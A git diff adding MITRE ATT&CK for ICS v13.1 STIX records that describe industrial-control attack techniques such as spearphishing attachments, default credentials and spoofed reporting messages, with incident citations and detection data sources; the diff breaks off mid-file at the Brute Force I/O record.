b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--63b6942d-8359-4506-bfb3-cf87aa8120ee.json new file mode 100644 index 0000000000000000000000000000000000000000..c29eb098ddc66abcc84c145ed9534629292eb62e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--63b6942d-8359-4506-bfb3-cf87aa8120ee.json @@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--d0a9d581-2c34-4153-868d-6dc6d88e12e0", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Loss of Productivity and Revenue", + "description": "Adversaries may cause loss of productivity and revenue through disruption and even damage to the availability and integrity of control system operations, devices, and related processes. This technique may manifest as a direct effect of an ICS-targeting attack or tangentially, due to an IT-targeting attack against non-segregated environments. \n\nIn cases where these operations or services are brought to a halt, the loss of productivity may eventually present an impact for the end-users or consumers of products and services. The disrupted supply-chain may result in supply shortages and increased prices, among other consequences. \n\nA ransomware attack on an Australian beverage company resulted in the shutdown of some manufacturing sites, including precautionary halts to protect key systems. (Citation: Paganini, Pierluigi June 2020) The company announced the potential for temporary shortages of their products following the attack. (Citation: Paganini, Pierluigi June 2020) (Citation: Lion Corporation June 2020) \n\nIn the 2021 Colonial Pipeline ransomware incident, the pipeline was unable to transport approximately 2.5 million barrels of fuel per day to the East Coast. (Citation: Colonial Pipeline Company May 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--63b6942d-8359-4506-bfb3-cf87aa8120ee", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0828", + "external_id": "T0828" + }, + { + "source_name": "Colonial Pipeline Company May 2021", + "description": "Colonial Pipeline Company 2021, May Media Statement Update: Colonial Pipeline System Disruption Retrieved. 2021/10/08 ", + "url": "https://www.colpipe.com/news/press-releases/media-statement-colonial-pipeline-system-disruption" + }, + { + "source_name": "Lion Corporation June 2020", + "description": "Lion Corporation 2020, June 26 Lion Cyber incident update: 26 June 2020 Retrieved. 2021/10/08 ", + "url": "https://lionco.com/2020/06/26/lion-update-re-cyber-issue/" + }, + { + "source_name": "Paganini, Pierluigi June 2020", + "description": "Paganini, Pierluigi 2020, June 14 Ransomware attack disrupts operations at Australian beverage company Lion Retrieved. 2021/10/08 ", + "url": "https://securityaffairs.co/wordpress/104749/cyber-crime/ransomware-attack-hit-lion.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426.json new file mode 100644 index 0000000000000000000000000000000000000000..70af5f2e765ebbe21e681477b796b6a140775cc7 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426.json @@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--c4d92fce-374c-4d96-b456-3accab472cd3", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Spearphishing Attachment", + "description": "Adversaries may use a spearphishing attachment, a variant of spearphishing, as a form of a social engineering attack against specific targets. Spearphishing attachments are different from other forms of spearphishing in that they employ malware attached to an email. All forms of spearphishing are electronically delivered and target a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T0863) to gain execution and access. (Citation: Enterprise ATT&CK October 2019) \n\nA Chinese spearphishing campaign running from December 9, 2011 through February 29, 2012, targeted ONG organizations and their employees. The emails were constructed with a high level of sophistication to convince employees to open the malicious file attachments. (Citation: CISA AA21-201A Pipeline Intrusion July 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Engineering Workstation", + "Human-Machine Interface", + "Control Server", + "Data Historian" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "File: File Creation", + "Application Log: Application Log Content", + "Process: Process Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0865", + "external_id": "T0865" + }, + { + "source_name": "CISA AA21-201A Pipeline Intrusion July 2021", + "description": "Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA) 2021, July 20 Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013 Retrieved. 2021/10/08 ", + "url": "https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf" + }, + { + "source_name": "Enterprise ATT&CK October 2019", + "description": "Enterprise ATT&CK 2019, October 25 Spearphishing Attachment Retrieved. 2019/10/25 ", + "url": "https://attack.mitre.org/techniques/T1193/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--7374ab87-0782-41f8-b415-678c0950bb2a.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--7374ab87-0782-41f8-b415-678c0950bb2a.json new file mode 100644 index 0000000000000000000000000000000000000000..281191747cc5008a4c4719d8210802bf687e819e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--7374ab87-0782-41f8-b415-678c0950bb2a.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--90a37c1b-68a3-4747-a1c3-89e60d087f1b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Location Identification", + "description": "Adversaries may perform location identification using device data to inform operations and targeted impact for attacks. Location identification data can come in a number of forms, including geographic location, location relative to other control system devices, time zone, and current time. An adversary may use an embedded global positioning system (GPS) module in a device to figure out the physical coordinates of a device. NIST SP800-82 recommends that devices utilize GPS or another location determining mechanism to attach appropriate timestamps to log entries (Citation: Guidance - NIST SP800-82). While this assists in logging and event tracking, an adversary could use the underlying positioning mechanism to determine the general location of a device. An adversary can also infer the physical location of serially connected devices by using serial connection enumeration. \n\nAn adversary attempt to attack and cause Impact could potentially affect other control system devices in close proximity. Device local-time and time-zone settings can also provide adversaries a rough indicator of device location, when specific geographic identifiers cannot be determined from the system.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Control Server" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--7374ab87-0782-41f8-b415-678c0950bb2a", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0825", + "external_id": "T0825" + }, + { + "source_name": "Guidance - NIST SP800-82", + "description": "Keith Stouffer. (2015, May). Guide to Industrial Control Systems (ICS) Security. Retrieved March 28, 2018.", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a.json new file mode 100644 index 0000000000000000000000000000000000000000..395c4cd206c7d6870d7c8148bc56d7f0b3a22a53 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--6fcfe567-df5d-4ad4-9d76-87de8dd321be", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Drive-by Compromise", + "description": "Adversaries may gain access to a system during a drive-by compromise, when a user visits a website as part of a regular browsing session. With this technique, the user's web browser is targeted and exploited simply by visiting the compromised website. \n\nThe adversary may target a specific community, such as trusted third party suppliers or other industry specific groups, which often visit the target website. This kind of targeted attack relies on a common interest, and is known as a strategic web compromise or watering hole attack. \n\nThe National Cyber Awareness System (NCAS) has issued a Technical Alert (TA) regarding Russian government cyber activity targeting critical infrastructure sectors. (Citation: Cybersecurity & Infrastructure Security Agency March 2018) Analysis by DHS and FBI has noted two distinct categories of victims in the Dragonfly campaign on the Western energy sector: staging and intended targets. The adversary targeted the less secure networks of staging targets, including trusted third-party suppliers and related peripheral organizations. Initial access to the intended targets used watering hole attacks to target process control, ICS, and critical infrastructure related trade publications and informational websites.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Process: Process Creation", + "Network Traffic: Network Connection Creation", + "Application Log: Application Log Content", + "File: File Creation", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0817", + "external_id": "T0817" + }, + { + "source_name": "Cybersecurity & Infrastructure Security Agency March 2018", + "description": "Cybersecurity & Infrastructure Security Agency 2018, March 15 Alert (TA18-074A) Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors Retrieved. 2019/10/11 ", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-074A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--83ebd22f-b401-4d59-8219-2294172cf916.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--83ebd22f-b401-4d59-8219-2294172cf916.json new file mode 100644 index 0000000000000000000000000000000000000000..6e89ddf4797f143953a1da828e9ff8e2a814ad54 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--83ebd22f-b401-4d59-8219-2294172cf916.json @@ -0,0 +1,65 @@ +{ + "type": "bundle", + "id": "bundle--e7dde92e-8291-4f3f-80a4-5fec06f5430a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:14:42.829Z", + "name": "Damage to Property", + "description": "Adversaries may cause damage and destruction of property to infrastructure, equipment, and the surrounding environment when attacking control systems. This technique may result in device and operational equipment breakdown, or represent tangential damage from other techniques used in an attack. Depending on the severity of physical damage and disruption caused to control processes and systems, this technique may result in [Loss of Safety](https://attack.mitre.org/techniques/T0880). Operations that result in [Loss of Control](https://attack.mitre.org/techniques/T0827) may also cause damage to property, which may be directly or indirectly motivated by an adversary seeking to cause impact in the form of [Loss of Productivity and Revenue](https://attack.mitre.org/techniques/T0828). \n\n\nThe German Federal Office for Information Security (BSI) reported a targeted attack on a steel mill under an incidents affecting business section of its 2014 IT Security Report. (Citation: BSI State of IT Security 2014) These targeted attacks affected industrial operations and resulted in breakdowns of control system components and even entire installations. As a result of these breakdowns, massive impact and damage resulted from the uncontrolled shutdown of a blast furnace. \n\nA Polish student used a remote controller device to interface with the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) (Citation: Bruce Schneier January 2008) Using this remote, the student was able to capture and replay legitimate tram signals. This resulted in damage to impacted trams, people, and the surrounding property. Reportedly, four trams were derailed and were forced to make emergency stops. (Citation: Shelley Smith February 2008) Commands issued by the student may have also resulted in tram collisions, causing harm to those on board and the environment outside. (Citation: Bruce Schneier January 2008)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "type": "attack-pattern", + "id": "attack-pattern--83ebd22f-b401-4d59-8219-2294172cf916", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0879", + "external_id": "T0879" + }, + { + "source_name": "Bruce Schneier January 2008", + "description": "Bruce Schneier 2008, January 17 Hacking Polish Trams Retrieved. 2019/10/17 ", + "url": "https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html" + }, + { + "source_name": "BSI State of IT Security 2014", + "description": "Bundesamt fr Sicherheit in der Informationstechnik (BSI) (German Federal Office for Information Security) 2014 Die Lage der IT-Sicherheit in Deutschland 2014 (The State of IT Security in Germany) Retrieved. 2019/10/30 ", + "url": "https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Securitysituation/IT-Security-Situation-in-Germany-2014.pdf?__blob=publicationFile&v=3" + }, + { + "source_name": "John Bill May 2017", + "description": "John Bill 2017, May 12 Hacked Cyber Security Railways Retrieved. 2019/10/17 ", + "url": "https://www.londonreconnections.com/2017/hacked-cyber-security-railways/" + }, + { + "source_name": "Shelley Smith February 2008", + "description": "Shelley Smith 2008, February 12 Teen Hacker in Poland Plays Trains and Derails City Tram System Retrieved. 2019/10/17 ", + "url": "https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4.json new file mode 100644 index 0000000000000000000000000000000000000000..2561e5c946e72f7c04a63ecece4386b59427e89e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4.json @@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--e2738638-e91c-468e-9608-bf3c534fd0f9", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:19:14.351Z", + "name": "Spoof Reporting Message", + "description": "Adversaries may spoof reporting messages in control system environments for evasion and to impair process control. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. Reporting messages are important for monitoring the normal operation of a system or identifying important events such as deviations from expected values. \n\nIf an adversary has the ability to Spoof Reporting Messages, they can impact the control system in many ways. The adversary can Spoof Reporting Messages that state that the process is operating normally, as a form of evasion. The adversary could also Spoof Reporting Messages to make the defenders and operators think that other errors are occurring in order to distract them from the actual source of a problem. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Control Server" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Windows Registry: Windows Registry Key Modification", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow", + "Operational Databases: Device Alarm" + ], + "type": "attack-pattern", + "id": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0856", + "external_id": "T0856" + }, + { + "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011", + "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ", + "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee.json new file mode 100644 index 0000000000000000000000000000000000000000..59f347c6faecb738c7a797de502e1411653631b5 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee.json @@ -0,0 +1,65 @@ +{ + "type": "bundle", + "id": "bundle--7aa08273-52b9-4b82-b3f6-617ed4d9e06d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Exploitation of Remote Services", + "description": "Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to enable remote service abuse. A common goal for post-compromise exploitation of remote services is for initial access into and lateral movement throughout the ICS environment to enable access to targeted systems. (Citation: Enterprise ATT&CK)\n\nICS asset owners and operators have been affected by ransomware (or disruptive malware masquerading as ransomware) migrating from enterprise IT to ICS environments: WannaCry, NotPetya, and BadRabbit. In each of these cases, self-propagating (wormable) malware initially infected IT networks, but through exploit (particularly the SMBv1-targeting MS17-010 vulnerability) spread to industrial networks, producing significant impacts. (Citation: Joe Slowik April 2019)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Data Historian", + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0866", + "external_id": "T0866" + }, + { + "source_name": "Enterprise ATT&CK", + "description": "Enterprise ATT&CK Exploitation of Remote Services Retrieved. 2019/10/27 ", + "url": "https://attack.mitre.org/techniques/T1210/" + }, + { + "source_name": "Joe Slowik April 2019", + "description": "Joe Slowik 2019, April 10 Implications of IT Ransomware for ICS Environments Retrieved. 2019/10/27 ", + "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349.json new file mode 100644 index 0000000000000000000000000000000000000000..359271b82155203612ea0fedc3da0e65683df662 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--b7ba66ba-494c-478e-b1a3-cdf6de52f89f", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Default Credentials", + "description": "Adversaries may leverage manufacturer or supplier set default credentials on control system devices. These default credentials may have administrative permissions and may be necessary for initial configuration of the device. It is general best practice to change the passwords for these accounts as soon as possible, but some manufacturers may have devices that have passwords or usernames that cannot be changed. (Citation: Keith Stouffer May 2015)\n\nDefault credentials are normally documented in an instruction manual that is either packaged with the device, published online through official means, or published online through unofficial means. Adversaries may leverage default credentials that have not been properly modified or disabled.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay", + "Control Server", + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Logon Session: Logon Session Creation", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0812", + "external_id": "T0812" + }, + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c.json new file mode 100644 index 0000000000000000000000000000000000000000..bb8e32f41fde7da00cc3bdb9b0b5daf8cfcad726 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c.json @@ -0,0 +1,61 @@ +{ + "type": "bundle", + "id": "bundle--ef731c50-a798-451f-bad0-df5e40189e73", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:16:55.602Z", + "name": "External Remote Services", + "description": "Adversaries may leverage external remote services as a point of initial access into your network. These services allow users to connect to internal network resources from external locations. Examples are VPNs, Citrix, and other access mechanisms. Remote service gateways often manage connections and credential authentication for these services. (Citation: Daniel Oakley, Travis Smith, Tripwire)\n\nExternal remote services allow administration of a control system from outside the system. Often, vendors and internal engineering groups have access to external remote services to control system networks via the corporate network. In some cases, this access is enabled directly from the internet. While remote access enables ease of maintenance when a control system is in a remote area, compromise of remote access solutions is a liability. The adversary may use these services to gain access to and execute attacks against a control system network. Access to valid accounts is often a requirement. \n\nAs they look for an entry point into the control system network, adversaries may begin searching for existing point-to-point VPN implementations at trusted third party networks or through remote support employee connections where split tunneling is enabled. (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Control Server", + "Input/Output Server" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Logon Session: Logon Session Metadata", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0822", + "external_id": "T0822" + }, + { + "source_name": "Daniel Oakley, Travis Smith, Tripwire", + "description": "Daniel Oakley, Travis Smith, Tripwire Retrieved. 2018/05/30 ", + "url": "https://attack.mitre.org/wiki/Technique/T1133" + }, + { + "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ", + "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4.json new file mode 100644 index 0000000000000000000000000000000000000000..28c80fe0e3b5541fa89e7ee74026bab9a7bb561e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--30d736b6-02a2-4192-9180-1bc91974058e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-29T16:17:27.903Z", + "name": "Brute Force I/O", + "description": "Adversaries may repetitively or successively change I/O point values to perform an action. Brute Force I/O may be achieved by changing either a range of I/O point values or a single point value repeatedly to manipulate a process function. The adversary's goal and the information they have about the target environment will influence which of the options they choose. In the case of brute forcing a range of point values, the adversary may be able to achieve an impact without targeting a specific point. In the case where a single point is targeted, the adversary may be able to generate instability on the process function associated with that particular point. \n\nAdversaries may use Brute Force I/O to cause failures within various industrial processes. These failures could be the result of wear on equipment or damage to downstream equipment.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Control Server", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Operational Databases: Process History/Live Data", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": 